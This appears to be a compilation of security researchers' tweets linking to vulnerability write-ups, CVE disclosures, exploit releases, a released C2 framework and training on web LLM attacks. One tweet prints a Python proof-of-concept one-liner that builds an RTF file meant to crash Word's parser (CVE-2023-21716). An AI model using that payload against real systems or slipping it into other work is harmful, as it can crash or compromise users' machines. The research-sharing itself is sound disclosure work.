Auditor's logs, 16th of August. I found a critical vulnerability in SushiSwap's MISO platform paradigm.xyz/2021/08/two-ri…

AppSec Ezine - 392nd Edition pathonproject.com/zb/?99b8642a3b… #AppSec #Security

Some of you asked for a part 2, so here you go! 🔥 From RpcView to #PetitPotam 🔥 👉 itm4n.github.io/from-rpcview-t… In this post I explain how you can reproduce the #PetitPotam trick using RpcView, but the same principle can be applied to any Windows RPC interface. 🙂

I'm too late at CVE-2021-40444 party. But i just wanted to take a look at MSIE exploitation. Awesome to see a full exploit (RCE w/ sandbox escape) only using 6 lines of javascript code. Cool no doubt.

An attack worthy of a Hollywood movie hacking scene! Our analysts Philipp and Felix identified a Padding Oracle vulnerability in the #SAML login of ArcGIS. Read the blog post to see what happened behind the scenes: blog.compass-security.com/2021/09/saml-p…

"Your adversary does not wait for you to finish patching." - The Art of Cyber War

Top 10 web hacking techniques of 2021: 🥇 Alex Birsan 🥈 James Kettle 🥉 Orange Tsai 🍊 portswigger.net/research/top-1…

"Abusing HTTP hop-by-hop request headers" by Nathan was nominated as a top web hacking technique back in 2019, and has just blossomed into an F5 BIG-IP unauth RCE! nathandavison.com/blog/abusing-h… portswigger.net/research/top-1… github.com/horizon3ai/CVE…

Dotnet's default AES encryption options are vulnerable to padding oracles. @0x446f49 wrote an article about it here: pulsesecurity.co.nz/articles/dotne…

☢️ I'm so excited - just issued my first blog post☢️ As promised - sharing my WarCon slides deck on: mgeeky.tech/warcon-2022-mo… Power of positive feedback made me publish them during my first day of holidays (●'◡'●) Let me know if you like it 🔥

Full disclosure for CVE-2021-21042 + CVE-2019-7040 is ready right here. github.com/j00sean/SecBug…

With the intent to be more transparent, I decided to release the source code of my C2 framework. Don't be evil :) github.com/enkomio/AlanFr…

Exploiting Arbitrary Object Instantiations in PHP without Custom Classes swarm.ptsecurity.com/exploiting-arb…

From open redirect to RCE in one week medium.com/@byq/from-open… #hackerone #BugBounty #bugbountytips #hackeronereport #writeups #Bugbountywriteupspublished

As promised! Here is the blog post detailing the Hekate full chain RCE I discussed yesterday at Black Hat! #BHUSA

Learn how we discovered 5 distinct vulnerabilities on WatchGuard #Firebox/#XTM firewalls, and obtained a pre-auth Remote Code Execution as root #0day (CVE-2022-31789, CVE-2022-31790). ambionics.io/blog/hacking-w…

My Rapid7 technical analysis of CVE-2022-21587 for Oracle E-business Suite is out. An arbitrary file upload vuln can be used to drop malicious JSP payloads, and we now have a Metasploit Project exploit for this in the pull queue too: attackerkb.com/topics/Bkij5kK…

CVE-2023-21716 Python PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

Here’s the slides of the talk I gave yesterday at NorthSec 2023 "Tips and tricks for Burp Suite Pro, ten years later" #nsec23 NorthSec agarri.fr/docs/nsec23-bu…

🔔 New topic alert: Web LLM attacks 🔔 Stay ahead in application security - dive into the world of LLMs to discover their weaknesses and understand how to exploit them. Read our latest learning materials and try your hand at the new interactive labs. portswigger.net/web-security/l…